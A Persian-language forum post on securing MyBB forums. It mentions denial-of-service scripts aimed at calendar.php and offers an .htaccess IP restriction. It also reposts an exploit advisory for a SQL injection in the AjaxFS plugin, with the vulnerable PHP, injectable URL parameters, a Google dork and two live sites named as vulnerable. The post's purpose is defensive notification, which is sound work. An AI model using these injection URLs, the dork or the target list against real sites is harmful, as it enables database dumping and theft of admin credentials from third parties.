امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5

راه مقابله با Hک سایت ها 3

#1
امروز چندتا اسکریپت نه چندان جدید ولی کار آمد برای حملات تکذیب سرویس MYBB رو بررسی کردم بد نیست توضیحی در موردش بدم :



مدتی قبل گروه Hک سیتی یک اسکریپت واسه تکذیب سرویس برای سیستم انجمن ساز MYBB نوشت که بر اساس پRوکSی اتک میداد و سایت Down میشد .



هدف حملات برای ارسال درخواست :



calendar.php



بود ، حالا یه سری تیم ها که اسمشونم نمیبرم با الهام گرفتن از همون شیوه حملات خودشونو تغییراتی دادند که بد نیست این قسمت ها رو برای مهمانان غیر فعال کنید و یا کلا غیر فعال کنید .



calendar.php

misc.php

و ....



البته جلوی این جملاتو به این راحتی ها نمیشه گرفت ولی با کانفیگ صحیح وب سرور و نصب یک فایروال با کانفیگ خود میشه تا حدودی جلوی این حملاتو گرفت که در جلسات بعدی در موردش توضیح میدم .



-----



یکی از دوستان پیام داده بود که سرورشو چک کردن و 3 4 تا از سایتهای روی سرورش مورد نفوذ قرار گرفته بود .



امنیت سرور شما در حد مطلوبی نیست ، اگر وبسایت شما مشترکان تخصصی داره بهتره سرورتون رو ارتقا بدید تا یه وقتی شیطون نشن





رنج IP بدید مثلا :




<files index.php>


order allow,deny


allow from 198.168


</files>







اخیرا آسیب پذیری جدید برای پلاگین AJAX FS پابلیک شده که SQLI میباشد .





نفوذ گر با استفاده از این آسیب پذیری میتواند اطلاعات مدیریت را از دیتابیس استخراح نماید مثل یوزر و پسورد مدیریت :








کد:

کد:
###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
  
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
  
# Author : Iranian Exploit DataBase
  
# Discovered By : IeDb
  
# Email : [email protected]  -  [email protected]
  
# Home : http://iedb.ir   -   http://iedb.ir/acc
  
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
  
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
  
# Security Risk : High
  
# Tested on : Linux
  
# Dork : inurl:ajaxfs.php
  
#################################
  
1)
  
  if(isset($_GET['tooltip']))
    {
    $pid=$_GET['tooltip'];
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
  
  
2)
  
if(isset($_GET['usertooltip']))
    {
    $uid=$_GET['usertooltip'];
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
  
http://localhost/Upload/ajaxfs.php?usertooltip=1'
  
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  
Google DORK : inurl:ajaxfs.php
  
  
# Exploit :
  
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
  
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
  
  
#################################
  
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
  
#################################




هر چند از ثبت کننده این آسیب پذیری خیلی خوشم نمیاد اما آسیب پذیری هست که پابلیک شده و وظیفه ما ایجاب میکنه برای وبسایت های ایرانی اطلاع رسانی انجام بدیم .





لینک پلاگین از سایت مرجع :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://mods.mybb.com/download/ajax-forum-stat-v-2





لینک اکسپلویت در سایت Exploit-DB :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://www.exploit-db.com/exploits/29797





دموی نفوذ به وبسایت از طریق این آسیب پذیری :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
https://www.youtube.com/watch?v=8BrqkHwMr6c





از جمله از وبسایت هایی که از این پلاگین استفاده میکنند و آسیب پذیر میباشند :





دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://forum.kardoonline.com/ajaxfs.php?tooltip=939%27


دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
http://airguns-club.ir/ajaxfs.php?tooltip=805%27


و .....





اگر صفحات لاگین باز باشد با استخراج یوزر و پسورد هکر میتوانید با کرک کردن هش به سایت دسترسی پیدا کند . و البته از طریق اینجکشن میشه کل دیتابیس را Dump کرد .





جهت پیشگیری از این حملات فعلا این پلاگین تا ارائه نسخه جدید غیر فعال شود دوستانی هم که احتیاج دارند بهش میتونند توی پیام خصوصی اعلام کنند تا آسیب پذیری براشون پچ بشه .




یا حق
پاسخ
آگهی


[-]
به اشتراک گذاری/بوکمارک (نمایش همه)
google Facebook cloob Twitter
برای ارسال نظر وارد حساب کاربری خود شوید یا ثبت نام کنید
شما جهت ارسال نظر در مطلب نیازمند عضویت در این انجمن هستید
ایجاد حساب کاربری
ساخت یک حساب کاربری شخصی در انجمن ما. این کار بسیار آسان است!
یا
ورود
از قبل حساب کاربری دارید? از اینجا وارد شوید.

موضوعات مرتبط با این موضوع...
  مقابله با هکر
  مقایسه☒☑ امنیتی▷◀◁وبلاگ؛سایت⚅⚄
  امنیت سایت وردپرس – آیا وردپرس امن است؟ ببینیم داده‌ها چه می‌گویند
  فروش آموزش دیفیس سایت های خارجی
  درخواست نویسندگی در بخش امنیت و روش های مقابله با هـک
  چیزهایی که وب‌سایت‌ ها درباره‌ شما می‌ دانند حذف کنید
  رفع مشکل ویروسی شدن سایت و ریدایرکت شدن سایت به دلیل وجود malware
  سایت‌های خرید و فروش کالاهای دست دوم، مکانی برای کلاهبرداران
  کرک کردن یا شکستن پسورد اکانت سایت ها و انجمن ها
  قوانین بخش "امنیت و روش های مقابله با هـک"

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان